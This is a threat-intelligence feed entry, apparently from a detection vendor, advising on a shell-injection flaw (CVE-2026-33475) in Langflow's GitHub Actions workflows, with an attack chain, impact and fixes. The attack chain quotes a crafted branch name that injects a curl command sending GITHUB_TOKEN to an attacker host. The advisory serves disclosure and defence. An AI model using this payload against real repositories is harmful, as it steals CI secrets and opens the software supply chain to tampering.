{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/shell-injection/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["shell-injection","github-actions","supply-chain"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eLangflow, a tool for building and deploying AI-powered agents and workflows, is vulnerable to a critical shell injection flaw in its GitHub Actions workflows. Discovered in versions prior to 1.9.0 and assigned CVE-2026-33475, the vulnerability stems from unsanitized interpolation of GitHub context variables (e.g., \u003ccode\u003e${{ github.head_ref }}\u003c/code\u003e) within the \u003ccode\u003erun:\u003c/code\u003e steps of various workflow files. By crafting malicious branch names or pull request titles, attackers can inject and execute arbitrary shell commands during CI/CD pipeline execution. Successful exploitation allows for the exfiltration of sensitive CI/CD secrets like \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e, manipulation of infrastructure, and potential compromise of the software supply chain. The vulnerability was patched in version 1.9.0. This poses a significant risk to any public Langflow fork with GitHub Actions enabled.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker forks the Langflow repository on GitHub.\u003c/li\u003e\n\u003cli\u003eThe attacker creates a new branch with a specially crafted name containing a shell injection payload, such as \u003ccode\u003einjection-test \u0026amp;\u0026amp; curl https://attacker.site/exfil?token=$GITHUB_TOKEN\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker submits a pull request from the malicious branch to the main branch of the forked repository.\u003c/li\u003e\n\u003cli\u003eGitHub Actions is triggered to run the affected workflow (e.g., \u003ccode\u003edeploy-docs-draft.yml\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWithin the workflow, the \u003ccode\u003erun:\u003c/code\u003e step attempts to use the unsanitized branch name via \u003ccode\u003e${{ github.head_ref }}\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected shell command executes, sending the \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker receives the \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e and can now authenticate to the GitHub API with the privileges of the affected workflow.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e to push malicious code, create new releases, or tamper with other aspects of the software supply chain.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis vulnerability allows for arbitrary code execution within the GitHub Actions CI/CD environment. A successful attack grants full access to CI secrets, potentially leading to the exfiltration of the \u003ccode\u003eGITHUB_TOKEN\u003c/code\u003e. The attacker can then push malicious tags or container images, tamper with releases, or leak sensitive infrastructure data.  Given the nature of CI/CD pipelines, a compromise could have far-reaching effects on any project that depends on the affected Langflow repository or its forks. The number of potential victims is directly proportional to the number of Langflow forks with enabled GitHub Actions.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to Langflow version 1.9.0 or later to patch CVE-2026-33475.\u003c/li\u003e\n\u003cli\u003eExamine GitHub Actions workflows for direct interpolation of GitHub context variables in \u003ccode\u003erun:\u003c/code\u003e steps, particularly those involving user-controlled values like branch names and pull request titles (e.g., in \u003ccode\u003e.github/workflows/deploy-docs-draft.yml\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eImplement proper sanitization or quoting of untrusted inputs before using them in shell commands within GitHub Actions workflows.\u003c/li\u003e\n\u003cli\u003eAdopt the suggested fix of using environment variables and wrapping them in double quotes when referencing GitHub context variables within \u003ccode\u003erun:\u003c/code\u003e steps (as described in the overview).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Github Actions Shell Injection via Branch Name\u003c/code\u003e to identify potentially malicious branch names used in pull requests.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-25T12:00:00Z","date_published":"2026-03-25T12:00:00Z","id":"/briefs/2026-03-langflow-shell-injection/","summary":"Unauthenticated remote shell injection vulnerability exists in Langflow GitHub Actions workflows prior to version 1.9.0, enabling attackers to execute arbitrary shell commands via malicious branch names or pull request titles due to unsanitized GitHub context variable interpolation, leading to potential secret exfiltration and supply chain compromise.","title":"Langflow GitHub Actions Shell Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-langflow-shell-injection/"}],"language":"en","title":"CraftedSignal Threat Feed — Shell-Injection","version":"https://jsonfeed.org/version/1.1"}